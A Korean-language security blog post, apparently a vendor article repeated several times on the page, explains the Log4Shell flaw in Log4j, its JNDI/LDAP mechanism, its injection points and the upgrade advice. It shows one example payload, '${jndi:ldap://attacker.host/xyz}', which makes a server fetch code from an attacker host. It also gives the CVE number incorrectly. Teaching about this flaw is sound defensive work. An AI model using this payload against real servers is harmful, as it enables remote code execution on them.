SCW 아이콘
영웅 배경, 구분선 없음
블로그

Log4j 취약점 설명 - 공격 경로와 방어 방법

로라 베르헤이드
게시됨 Jan 16, 2022
마지막 업데이트: 2026년 3월 6일

12월 9일, Java Log4j 라이브러리의 제로데이 취약점이 공개되었습니다. CVE-44228로 명명된 이 취약점은 '로그 쉘(Log Shell)'이라는 별칭을 가지며, 원격 코드 실행(RCE)을 유발할 수 있어 '심각도 높음' 등급을 받았습니다. 또한 log4j-core는 가장 널리 사용되는 자바 로깅 라이브러리 중 하나이므로 수백만 개의 애플리케이션이 위험에 노출되었습니다.

Log4Shell을 활용해 빠르게 실력을 향상시키고 싶으신가요?

우리는 Log4Shell의 기본 개념부터 '미션'이라는 시뮬레이터에서 이 취약점을 악용하는 방법까지 안내하는 데모를 제작했습니다. 이 미션을 진행하며 Log4j 취약점이 인프라와 애플리케이션에 미치는 영향을 설명해 드리겠습니다. 데모를 바로 보려면 여기를 클릭하거나, 이 취약점에 대해 자세히 알아보려면 계속 읽어보세요.

옛날 이야기?

이 취약점은 새로운 것이 아니다. 이미 2016년 블랙햇 컨퍼런스에서 보안 연구원 알바로 무뇨즈와 올렉산드르 미로시는 "애플리케이션은 신뢰할 수 없는 데이터로 JNDI 조회를 수행해서는 안 된다"고 강조했으며, 표적화된 JNDI/LDAP 주입이 원격 코드 실행으로 이어질 수 있음을 시연했다. 바로 이것이 Log4Shell의 핵심입니다.

공격 벡터

Log4Shell의 유틸 인젝션 코드는 다음과 같습니다:

$ {jndi:ldap : //attacker.host/xyz}

Pour comprendre cela, nous devons connaître le langage d'expression Java (EL). Expressions écrites dans la syntaxe suivante : $ {expr} sera évalué lors de l'exécution. Par exemple, $ {java:version} renverra la version Java utilisée.

다음으로 JNDI( Java Directory and Directory Interface)가 있습니다. 이는 LDAP, DNS, RMI 등의 프로토콜을 사용하여 서비스에 연결하고 데이터나 리소스를 가져올 수 있게 해주는 API입니다. 간단히 말해, 위의 악성 페이로드 예시에서 JNDI는 공격자가 제어하는 LDAP 서버를 검색합니다. 예를 들어, 그 응답은 악성 코드가 포함된 자바 클래스 파일을 가리킬 수 있으며, 이는 취약한 서버에서 실행될 것입니다.

이 취약점이 특히 문제가 되는 이유는 Log4j가 모든 로그 입력을 평가하고 EL 구문으로 기록된 모든 사용자 입력에 대해 "jndi" 접두사로 검색을 수행하기 때문입니다. 사용자가 데이터를 입력할 수 있는 모든 위치(예: 양식 필드)에 페이로드가 주입될 수 있습니다. 또한 User Agent, X-Forwarded-For 등의 HTTP 헤더 및 기타 헤더를 페이로드를 전달하기 위해 조작할 수 있습니다.

직접 그 성과를 확인하려면 저희 쇼룸을 방문하시고 2단계인 '경험의 영향력'으로 넘어가세요.

예방 : 인식

모든 애플리케이션에 대해 업그레이드를 권장합니다. Log4j가 취약한 코드를 수정했기 때문입니다. 그러나 버전 2.15.0과 2.16.0에는 DDoS 및 기타 취약점이 포함되어 있어, 12월 말부터는 버전 2.17.0으로의 업그레이드를 권장합니다.

코드를 작성하는 개발자로서 우리는 항상 보안을 고려해야 합니다. Log4Shell은 프레임워크나 타사 라이브러리를 사용할 때 위험이 따를 수 있음을 가르쳐 주었습니다. 우리는 외부 소스를 사용함으로써 애플리케이션의 보안이 위협받을 수 있다는 점을 인지해야 합니다. 우리는 무심코 그 소스들이 안전하다고 가정하기 때문입니다.

이 취약점은 예방할 수 있었을까? 그렇기도 하고 아니기도 하다. 한편으로는 개발자들이 취약한 구성 요소가 타사 소프트웨어를 통해 도입되기 때문에 아무것도 할 수 없다. 다른 한편으로는 여기서 얻을 수 있는 교훈은 수없이 반복되어 온 교훈, 즉 사용자의 입력값을 절대 신뢰해서는 안 된다는 것이다.

Secure Code Warrior 보안에 민감한 개발자가 코드 내 취약점 발생을 방지하는 최선의 해결책이라고 Secure Code Warrior . SCW가 프로그래밍 프레임워크별 대규모 교육을 제공함에 따라 고객사들은 보고 데이터를 활용해 관련 자바 개발자를 신속히 파악할 수 있었습니다. 또한 SCW에서 양성한 보안 챔피언들을 통해 Log4j 업그레이드 속도를 높였습니다.

특히 자바 개발자를 위해 Secure Code Warrior 무료 IntelliJ 플러그인인 Sensei Secure Code Warrior . 이 규칙 기반 코드 분석 도구는 코딩 지침을 적용하고 취약점을 예방 및 수정하는 데 사용할 수 있습니다. 사용자 정의 규칙을 생성하거나 당사의 즉시 사용 가능한 레시피를 활용할 수 있습니다. 저희 레시피에 참여해 보시고, Log4Shell 취약점을 순식간에 찾아 수정하는 데 도움이 되는 Log4j 레시피북을 다운로드하는 것도 잊지 마세요.

Log4Shell에 대한 방어 역량을 강화하세요

이 블로그 글에서 배운 내용을 직접 적용해보고 싶으신가요? 저희 데모 환경이 도움이 될 수 있습니다. 프레젠테이션 시작 부분에서 해당 취약점에 대한 간략한 개요를 확인한 후, 안내된 지침에 따라 익스플로잇을 시도해볼 수 있는 시뮬레이션 환경으로 이동하게 됩니다.


리소스 표시
리소스 표시

2021년 12월, 자바 라이브러리 Log4j에서 Log4Shell이라는 중대한 보안 취약점이 발견되었습니다. 본 글에서는 Log4Shell 취약점을 가장 쉽게 설명하여 그 기본 원리를 이해할 수 있도록 하고, 여러분에게 한 가지 미션을 제시합니다: 이 취약점에 대한 지식을 활용하여 시뮬레이션된 웹사이트를 공격해 볼 수 있는 연습 환경입니다.

더 알고 싶으신가요?

더 알아보세요

Secure Code Warrior 귀사의 조직이 소프트웨어 개발 주기 전반에 걸쳐 코드를 안전하게 보호하고 사이버보안이 최우선 과제인 문화를 조성하도록 Secure Code Warrior . 애플리케이션 보안 담당자, 개발자, IT 보안 책임자 또는 보안 관련 업무에 종사하는 모든 분들을 위해, 저희는 귀사의 조직이 안전하지 않은 코드로 인한 위험을 줄일 수 있도록 돕습니다.

데모 예약하기
공유하기:
링크드인 브랜드사회적x 로고
작가
로라 베르헤이드
게시일: Jan 16, 2022

Laura Verheyde est une développeuse de logiciels chez Secure Code Warrior qui se concentre sur la recherche de vulnérabilités et la création de contenu pour les missions et les laboratoires de codage.

공유하기:
링크드인 브랜드사회적x 로고

12월 9일, Java Log4j 라이브러리의 제로데이 취약점이 공개되었습니다. CVE-44228로 명명된 이 취약점은 '로그 쉘(Log Shell)'이라는 별칭을 가지며, 원격 코드 실행(RCE)을 유발할 수 있어 '심각도 높음' 등급을 받았습니다. 또한 log4j-core는 가장 널리 사용되는 자바 로깅 라이브러리 중 하나이므로 수백만 개의 애플리케이션이 위험에 노출되었습니다.

Log4Shell을 활용해 빠르게 실력을 향상시키고 싶으신가요?

우리는 Log4Shell의 기본 개념부터 '미션'이라는 시뮬레이터에서 이 취약점을 악용하는 방법까지 안내하는 데모를 제작했습니다. 이 미션을 진행하며 Log4j 취약점이 인프라와 애플리케이션에 미치는 영향을 설명해 드리겠습니다. 데모를 바로 보려면 여기를 클릭하거나, 이 취약점에 대해 자세히 알아보려면 계속 읽어보세요.

옛날 이야기?

이 취약점은 새로운 것이 아니다. 이미 2016년 블랙햇 컨퍼런스에서 보안 연구원 알바로 무뇨즈와 올렉산드르 미로시는 "애플리케이션은 신뢰할 수 없는 데이터로 JNDI 조회를 수행해서는 안 된다"고 강조했으며, 표적화된 JNDI/LDAP 주입이 원격 코드 실행으로 이어질 수 있음을 시연했다. 바로 이것이 Log4Shell의 핵심입니다.

공격 벡터

Log4Shell의 유틸 인젝션 코드는 다음과 같습니다:

$ {jndi:ldap : //attacker.host/xyz}

Pour comprendre cela, nous devons connaître le langage d'expression Java (EL). Expressions écrites dans la syntaxe suivante : $ {expr} sera évalué lors de l'exécution. Par exemple, $ {java:version} renverra la version Java utilisée.

다음으로 JNDI( Java Directory and Directory Interface)가 있습니다. 이는 LDAP, DNS, RMI 등의 프로토콜을 사용하여 서비스에 연결하고 데이터나 리소스를 가져올 수 있게 해주는 API입니다. 간단히 말해, 위의 악성 페이로드 예시에서 JNDI는 공격자가 제어하는 LDAP 서버를 검색합니다. 예를 들어, 그 응답은 악성 코드가 포함된 자바 클래스 파일을 가리킬 수 있으며, 이는 취약한 서버에서 실행될 것입니다.

이 취약점이 특히 문제가 되는 이유는 Log4j가 모든 로그 입력을 평가하고 EL 구문으로 기록된 모든 사용자 입력에 대해 "jndi" 접두사로 검색을 수행하기 때문입니다. 사용자가 데이터를 입력할 수 있는 모든 위치(예: 양식 필드)에 페이로드가 주입될 수 있습니다. 또한 User Agent, X-Forwarded-For 등의 HTTP 헤더 및 기타 헤더를 페이로드를 전달하기 위해 조작할 수 있습니다.

직접 그 성과를 확인하려면 저희 쇼룸을 방문하시고 2단계인 '경험의 영향력'으로 넘어가세요.

예방 : 인식

모든 애플리케이션에 대해 업그레이드를 권장합니다. Log4j가 취약한 코드를 수정했기 때문입니다. 그러나 버전 2.15.0과 2.16.0에는 DDoS 및 기타 취약점이 포함되어 있어, 12월 말부터는 버전 2.17.0으로의 업그레이드를 권장합니다.

코드를 작성하는 개발자로서 우리는 항상 보안을 고려해야 합니다. Log4Shell은 프레임워크나 타사 라이브러리를 사용할 때 위험이 따를 수 있음을 가르쳐 주었습니다. 우리는 외부 소스를 사용함으로써 애플리케이션의 보안이 위협받을 수 있다는 점을 인지해야 합니다. 우리는 무심코 그 소스들이 안전하다고 가정하기 때문입니다.

이 취약점은 예방할 수 있었을까? 그렇기도 하고 아니기도 하다. 한편으로는 개발자들이 취약한 구성 요소가 타사 소프트웨어를 통해 도입되기 때문에 아무것도 할 수 없다. 다른 한편으로는 여기서 얻을 수 있는 교훈은 수없이 반복되어 온 교훈, 즉 사용자의 입력값을 절대 신뢰해서는 안 된다는 것이다.

Secure Code Warrior 보안에 민감한 개발자가 코드 내 취약점 발생을 방지하는 최선의 해결책이라고 Secure Code Warrior . SCW가 프로그래밍 프레임워크별 대규모 교육을 제공함에 따라 고객사들은 보고 데이터를 활용해 관련 자바 개발자를 신속히 파악할 수 있었습니다. 또한 SCW에서 양성한 보안 챔피언들을 통해 Log4j 업그레이드 속도를 높였습니다.

특히 자바 개발자를 위해 Secure Code Warrior 무료 IntelliJ 플러그인인 Sensei Secure Code Warrior . 이 규칙 기반 코드 분석 도구는 코딩 지침을 적용하고 취약점을 예방 및 수정하는 데 사용할 수 있습니다. 사용자 정의 규칙을 생성하거나 당사의 즉시 사용 가능한 레시피를 활용할 수 있습니다. 저희 레시피에 참여해 보시고, Log4Shell 취약점을 순식간에 찾아 수정하는 데 도움이 되는 Log4j 레시피북을 다운로드하는 것도 잊지 마세요.

Log4Shell에 대한 방어 역량을 강화하세요

이 블로그 글에서 배운 내용을 직접 적용해보고 싶으신가요? 저희 데모 환경이 도움이 될 수 있습니다. 프레젠테이션 시작 부분에서 해당 취약점에 대한 간략한 개요를 확인한 후, 안내된 지침에 따라 익스플로잇을 시도해볼 수 있는 시뮬레이션 환경으로 이동하게 됩니다.


리소스 표시
리소스 표시

아래 양식을 작성하여 보고서를 다운로드하세요

저희 제품 및/또는 안전한 코딩 관련 주제에 대한 정보를 보내드리는 데 귀하의 허락을 받고자 합니다. 귀하의 개인정보는 항상 최대한 신중하게 처리하며, 마케팅 목적으로 다른 기업에 절대 판매하지 않을 것입니다.

제출하다
scw 성공 아이콘
scw 오류 아이콘
양식을 제출하려면 '분석' 쿠키를 활성화해 주십시오. 완료 후에는 다시 비활성화하셔도 됩니다.

12월 9일, Java Log4j 라이브러리의 제로데이 취약점이 공개되었습니다. CVE-44228로 명명된 이 취약점은 '로그 쉘(Log Shell)'이라는 별칭을 가지며, 원격 코드 실행(RCE)을 유발할 수 있어 '심각도 높음' 등급을 받았습니다. 또한 log4j-core는 가장 널리 사용되는 자바 로깅 라이브러리 중 하나이므로 수백만 개의 애플리케이션이 위험에 노출되었습니다.

Log4Shell을 활용해 빠르게 실력을 향상시키고 싶으신가요?

우리는 Log4Shell의 기본 개념부터 '미션'이라는 시뮬레이터에서 이 취약점을 악용하는 방법까지 안내하는 데모를 제작했습니다. 이 미션을 진행하며 Log4j 취약점이 인프라와 애플리케이션에 미치는 영향을 설명해 드리겠습니다. 데모를 바로 보려면 여기를 클릭하거나, 이 취약점에 대해 자세히 알아보려면 계속 읽어보세요.

옛날 이야기?

이 취약점은 새로운 것이 아니다. 이미 2016년 블랙햇 컨퍼런스에서 보안 연구원 알바로 무뇨즈와 올렉산드르 미로시는 "애플리케이션은 신뢰할 수 없는 데이터로 JNDI 조회를 수행해서는 안 된다"고 강조했으며, 표적화된 JNDI/LDAP 주입이 원격 코드 실행으로 이어질 수 있음을 시연했다. 바로 이것이 Log4Shell의 핵심입니다.

공격 벡터

Log4Shell의 유틸 인젝션 코드는 다음과 같습니다:

$ {jndi:ldap : //attacker.host/xyz}

Pour comprendre cela, nous devons connaître le langage d'expression Java (EL). Expressions écrites dans la syntaxe suivante : $ {expr} sera évalué lors de l'exécution. Par exemple, $ {java:version} renverra la version Java utilisée.

다음으로 JNDI( Java Directory and Directory Interface)가 있습니다. 이는 LDAP, DNS, RMI 등의 프로토콜을 사용하여 서비스에 연결하고 데이터나 리소스를 가져올 수 있게 해주는 API입니다. 간단히 말해, 위의 악성 페이로드 예시에서 JNDI는 공격자가 제어하는 LDAP 서버를 검색합니다. 예를 들어, 그 응답은 악성 코드가 포함된 자바 클래스 파일을 가리킬 수 있으며, 이는 취약한 서버에서 실행될 것입니다.

이 취약점이 특히 문제가 되는 이유는 Log4j가 모든 로그 입력을 평가하고 EL 구문으로 기록된 모든 사용자 입력에 대해 "jndi" 접두사로 검색을 수행하기 때문입니다. 사용자가 데이터를 입력할 수 있는 모든 위치(예: 양식 필드)에 페이로드가 주입될 수 있습니다. 또한 User Agent, X-Forwarded-For 등의 HTTP 헤더 및 기타 헤더를 페이로드를 전달하기 위해 조작할 수 있습니다.

직접 그 성과를 확인하려면 저희 쇼룸을 방문하시고 2단계인 '경험의 영향력'으로 넘어가세요.

예방 : 인식

모든 애플리케이션에 대해 업그레이드를 권장합니다. Log4j가 취약한 코드를 수정했기 때문입니다. 그러나 버전 2.15.0과 2.16.0에는 DDoS 및 기타 취약점이 포함되어 있어, 12월 말부터는 버전 2.17.0으로의 업그레이드를 권장합니다.

코드를 작성하는 개발자로서 우리는 항상 보안을 고려해야 합니다. Log4Shell은 프레임워크나 타사 라이브러리를 사용할 때 위험이 따를 수 있음을 가르쳐 주었습니다. 우리는 외부 소스를 사용함으로써 애플리케이션의 보안이 위협받을 수 있다는 점을 인지해야 합니다. 우리는 무심코 그 소스들이 안전하다고 가정하기 때문입니다.

이 취약점은 예방할 수 있었을까? 그렇기도 하고 아니기도 하다. 한편으로는 개발자들이 취약한 구성 요소가 타사 소프트웨어를 통해 도입되기 때문에 아무것도 할 수 없다. 다른 한편으로는 여기서 얻을 수 있는 교훈은 수없이 반복되어 온 교훈, 즉 사용자의 입력값을 절대 신뢰해서는 안 된다는 것이다.

Secure Code Warrior 보안에 민감한 개발자가 코드 내 취약점 발생을 방지하는 최선의 해결책이라고 Secure Code Warrior . SCW가 프로그래밍 프레임워크별 대규모 교육을 제공함에 따라 고객사들은 보고 데이터를 활용해 관련 자바 개발자를 신속히 파악할 수 있었습니다. 또한 SCW에서 양성한 보안 챔피언들을 통해 Log4j 업그레이드 속도를 높였습니다.

특히 자바 개발자를 위해 Secure Code Warrior 무료 IntelliJ 플러그인인 Sensei Secure Code Warrior . 이 규칙 기반 코드 분석 도구는 코딩 지침을 적용하고 취약점을 예방 및 수정하는 데 사용할 수 있습니다. 사용자 정의 규칙을 생성하거나 당사의 즉시 사용 가능한 레시피를 활용할 수 있습니다. 저희 레시피에 참여해 보시고, Log4Shell 취약점을 순식간에 찾아 수정하는 데 도움이 되는 Log4j 레시피북을 다운로드하는 것도 잊지 마세요.

Log4Shell에 대한 방어 역량을 강화하세요

이 블로그 글에서 배운 내용을 직접 적용해보고 싶으신가요? 저희 데모 환경이 도움이 될 수 있습니다. 프레젠테이션 시작 부분에서 해당 취약점에 대한 간략한 개요를 확인한 후, 안내된 지침에 따라 익스플로잇을 시도해볼 수 있는 시뮬레이션 환경으로 이동하게 됩니다.


웨비나 보기
시작하세요
더 알아보세요

아래 링크를 클릭하고 이 자료의 PDF를 다운로드하세요.

Secure Code Warrior 귀사의 조직이 소프트웨어 개발 주기 전반에 걸쳐 코드를 안전하게 보호하고 사이버보안이 최우선 과제인 문화를 조성하도록 Secure Code Warrior . 애플리케이션 보안 담당자, 개발자, IT 보안 책임자 또는 보안 관련 업무에 종사하는 모든 분들을 위해, 저희는 귀사의 조직이 안전하지 않은 코드로 인한 위험을 줄일 수 있도록 돕습니다.

보고서 표시데모 예약하기
리소스 표시
공유하기:
링크드인 브랜드사회적x 로고
더 알고 싶으신가요?

공유하기:
링크드인 브랜드사회적x 로고
작가
로라 베르헤이드
게시일: Jan 16, 2022

Laura Verheyde est une développeuse de logiciels chez Secure Code Warrior qui se concentre sur la recherche de vulnérabilités et la création de contenu pour les missions et les laboratoires de codage.

공유하기:
링크드인 브랜드사회적x 로고

12월 9일, Java Log4j 라이브러리의 제로데이 취약점이 공개되었습니다. CVE-44228로 명명된 이 취약점은 '로그 쉘(Log Shell)'이라는 별칭을 가지며, 원격 코드 실행(RCE)을 유발할 수 있어 '심각도 높음' 등급을 받았습니다. 또한 log4j-core는 가장 널리 사용되는 자바 로깅 라이브러리 중 하나이므로 수백만 개의 애플리케이션이 위험에 노출되었습니다.

Log4Shell을 활용해 빠르게 실력을 향상시키고 싶으신가요?

우리는 Log4Shell의 기본 개념부터 '미션'이라는 시뮬레이터에서 이 취약점을 악용하는 방법까지 안내하는 데모를 제작했습니다. 이 미션을 진행하며 Log4j 취약점이 인프라와 애플리케이션에 미치는 영향을 설명해 드리겠습니다. 데모를 바로 보려면 여기를 클릭하거나, 이 취약점에 대해 자세히 알아보려면 계속 읽어보세요.

옛날 이야기?

이 취약점은 새로운 것이 아니다. 이미 2016년 블랙햇 컨퍼런스에서 보안 연구원 알바로 무뇨즈와 올렉산드르 미로시는 "애플리케이션은 신뢰할 수 없는 데이터로 JNDI 조회를 수행해서는 안 된다"고 강조했으며, 표적화된 JNDI/LDAP 주입이 원격 코드 실행으로 이어질 수 있음을 시연했다. 바로 이것이 Log4Shell의 핵심입니다.

공격 벡터

Log4Shell의 유틸 인젝션 코드는 다음과 같습니다:

$ {jndi:ldap : //attacker.host/xyz}

Pour comprendre cela, nous devons connaître le langage d'expression Java (EL). Expressions écrites dans la syntaxe suivante : $ {expr} sera évalué lors de l'exécution. Par exemple, $ {java:version} renverra la version Java utilisée.

다음으로 JNDI( Java Directory and Directory Interface)가 있습니다. 이는 LDAP, DNS, RMI 등의 프로토콜을 사용하여 서비스에 연결하고 데이터나 리소스를 가져올 수 있게 해주는 API입니다. 간단히 말해, 위의 악성 페이로드 예시에서 JNDI는 공격자가 제어하는 LDAP 서버를 검색합니다. 예를 들어, 그 응답은 악성 코드가 포함된 자바 클래스 파일을 가리킬 수 있으며, 이는 취약한 서버에서 실행될 것입니다.

이 취약점이 특히 문제가 되는 이유는 Log4j가 모든 로그 입력을 평가하고 EL 구문으로 기록된 모든 사용자 입력에 대해 "jndi" 접두사로 검색을 수행하기 때문입니다. 사용자가 데이터를 입력할 수 있는 모든 위치(예: 양식 필드)에 페이로드가 주입될 수 있습니다. 또한 User Agent, X-Forwarded-For 등의 HTTP 헤더 및 기타 헤더를 페이로드를 전달하기 위해 조작할 수 있습니다.

직접 그 성과를 확인하려면 저희 쇼룸을 방문하시고 2단계인 '경험의 영향력'으로 넘어가세요.

예방 : 인식

모든 애플리케이션에 대해 업그레이드를 권장합니다. Log4j가 취약한 코드를 수정했기 때문입니다. 그러나 버전 2.15.0과 2.16.0에는 DDoS 및 기타 취약점이 포함되어 있어, 12월 말부터는 버전 2.17.0으로의 업그레이드를 권장합니다.

코드를 작성하는 개발자로서 우리는 항상 보안을 고려해야 합니다. Log4Shell은 프레임워크나 타사 라이브러리를 사용할 때 위험이 따를 수 있음을 가르쳐 주었습니다. 우리는 외부 소스를 사용함으로써 애플리케이션의 보안이 위협받을 수 있다는 점을 인지해야 합니다. 우리는 무심코 그 소스들이 안전하다고 가정하기 때문입니다.

이 취약점은 예방할 수 있었을까? 그렇기도 하고 아니기도 하다. 한편으로는 개발자들이 취약한 구성 요소가 타사 소프트웨어를 통해 도입되기 때문에 아무것도 할 수 없다. 다른 한편으로는 여기서 얻을 수 있는 교훈은 수없이 반복되어 온 교훈, 즉 사용자의 입력값을 절대 신뢰해서는 안 된다는 것이다.

Secure Code Warrior 보안에 민감한 개발자가 코드 내 취약점 발생을 방지하는 최선의 해결책이라고 Secure Code Warrior . SCW가 프로그래밍 프레임워크별 대규모 교육을 제공함에 따라 고객사들은 보고 데이터를 활용해 관련 자바 개발자를 신속히 파악할 수 있었습니다. 또한 SCW에서 양성한 보안 챔피언들을 통해 Log4j 업그레이드 속도를 높였습니다.

특히 자바 개발자를 위해 Secure Code Warrior 무료 IntelliJ 플러그인인 Sensei Secure Code Warrior . 이 규칙 기반 코드 분석 도구는 코딩 지침을 적용하고 취약점을 예방 및 수정하는 데 사용할 수 있습니다. 사용자 정의 규칙을 생성하거나 당사의 즉시 사용 가능한 레시피를 활용할 수 있습니다. 저희 레시피에 참여해 보시고, Log4Shell 취약점을 순식간에 찾아 수정하는 데 도움이 되는 Log4j 레시피북을 다운로드하는 것도 잊지 마세요.

Log4Shell에 대한 방어 역량을 강화하세요

이 블로그 글에서 배운 내용을 직접 적용해보고 싶으신가요? 저희 데모 환경이 도움이 될 수 있습니다. 프레젠테이션 시작 부분에서 해당 취약점에 대한 간략한 개요를 확인한 후, 안내된 지침에 따라 익스플로잇을 시도해볼 수 있는 시뮬레이션 환경으로 이동하게 됩니다.


목차

PDF 다운로드
리소스 표시
더 알고 싶으신가요?

더 알아보세요

Secure Code Warrior 귀사의 조직이 소프트웨어 개발 주기 전반에 걸쳐 코드를 안전하게 보호하고 사이버보안이 최우선 과제인 문화를 조성하도록 Secure Code Warrior . 애플리케이션 보안 담당자, 개발자, IT 보안 책임자 또는 보안 관련 업무에 종사하는 모든 분들을 위해, 저희는 귀사의 조직이 안전하지 않은 코드로 인한 위험을 줄일 수 있도록 돕습니다.

데모 예약하기Télécharger
공유하기:
링크드인 브랜드사회적x 로고
자원 센터

시작하는 데 도움이 되는 자료

더 많은 게시물
자원 센터

시작하는 데 도움이 되는 자료

더 많은 게시물